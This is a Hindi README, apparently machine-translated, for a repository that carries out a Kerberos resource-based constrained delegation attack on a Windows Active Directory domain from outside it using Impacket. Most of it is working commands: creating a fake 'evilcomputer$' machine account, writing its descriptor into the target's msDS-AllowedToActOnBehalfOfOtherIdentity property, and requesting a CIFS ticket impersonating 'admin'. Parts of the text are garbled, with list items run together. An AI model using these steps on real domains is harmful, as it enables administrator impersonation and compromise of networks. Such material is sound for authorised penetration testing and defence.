
बाहर से Impacket का उपयोग करके Kerberos Resource-Based Constrained Delegation Attack
यह रिपॉजिटरी विंडोज एक्टिव डायरेक्टरी डोमेन में केर्बेरोस रिसोर्स-बेस्ड कंस्ट्रेंड डेलिगेशन के खिलाफ एक व्यावहारिक हमले के बारे में है।
अन्य सामान्य कार्यान्वयनों से अंतर यह है कि हम हमले को विंडोज डोमेन के बाहर से लॉन्च कर रहे हैं, न कि डोमेन से जुड़े (आमतौर पर विंडोज) कंप्यूटर से।
हमला केवल Python3 Impacket (और इसकी निर्भरताओं) का उपयोग करके कार्यान्वित किया गया है। Arch पर अप-टू-डेट Impacket (लेखन के समय 0.9.21) के साथ परीक्षण किया गया।

संक्षेप में, बिना किसी गहरे विवरण के, हमला एक डोमेन कंप्यूटर को लक्ष्य करता है, विशेष रूप से लक्ष्य डोमेन कंप्यूटर से संबंधित सेवा प्रिंसिपलों को।
यहां हमें पूर्वापेक्षा के रूप में क्या चाहिए:
msDS-AllowedToActOnBehalfOfOtherIdentity प्रॉपर्टी तक लेखन पहुंच)MachineAccountQuota देखें)हमले का मार्ग बहुत उच्च स्तर पर:
msDS-AllowedToActOnBehalfOfOtherIdentity प्रॉपर्टी का दुरुपयोग करेंलाभ:
इस हमले के लिए सामान्य टूलसेट एक डोमेन-जॉइन विंडोज कंप्यूटर पर काम करते हैं, जो उपयोग करते हैं:
msDS-AllowedToActOnBehalfOfOtherIdentity के दुरुपयोग के लिएयह कार्यान्वयन डोमेन के बाहर से शुद्ध Impacket का उपयोग करता है।
Impacket से addcomputer.py उदाहरण का उपयोग करके एक नकली कंप्यूटर (evilcomputer नाम का) बनाते हैं:
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0
रीपो में यहां पाए जाने वाली स्क्रिप्ट rbcd.py को लागू किया गया है जो नवनिर्मित EVILCOMPUTER के संबंधित सुरक्षा डिस्क्रिप्टर को लक्ष्य कंप्यूटर की msDS-AllowedToActOnBehalfOfOtherIdentity प्रॉपर्टी में जोड़ता है।
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
स्क्रिप्ट ntlmrelayx.py इम्पैकेट उदाहरण में Python कक्षाओं का भारी उपयोग करती है। सहायता और उदाहरण के लिए बिना विकल्पों के स्क्रिप्ट को कॉल करें।
अब S4U2Self क्वेरी द्वारा कंस्ट्रेंड डेलिगेशन का दुरुपयोग करने और लक्ष्य कंप्यूटर के लिए एक प्रतिरूपित सेवा टिकट प्राप्त करने के लिए सब कुछ तैयार है। getST.py इम्पैकेट उदाहरण स्क्रिप्ट के साथ:
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
उपरोक्त कमांड लक्षित डोमेन उपयोगकर्ता admin की ओर से एक CIFS सेवा टिकट प्राप्त करता है और इसे फ़ाइल admin.ccache में संग्रहीत करता है।
फ़ाइल पथ को KRB5CCNAME वेरिएबल में जोड़ने के बाद टिकट Kerberos क्लाइंट के लिए उपयोग योग्य होता है।
export KRB5CCNAME=`pwd`/admin.ccache
klist
संसाधन-आधारित प्रतिबंधित प्रतिनिधिमंडल के दुरुपयोग के विवरण के लिए:
और केर्बेरोस हमलों के बारे में सबसे व्यापक प्रस्तुतियों में से एक: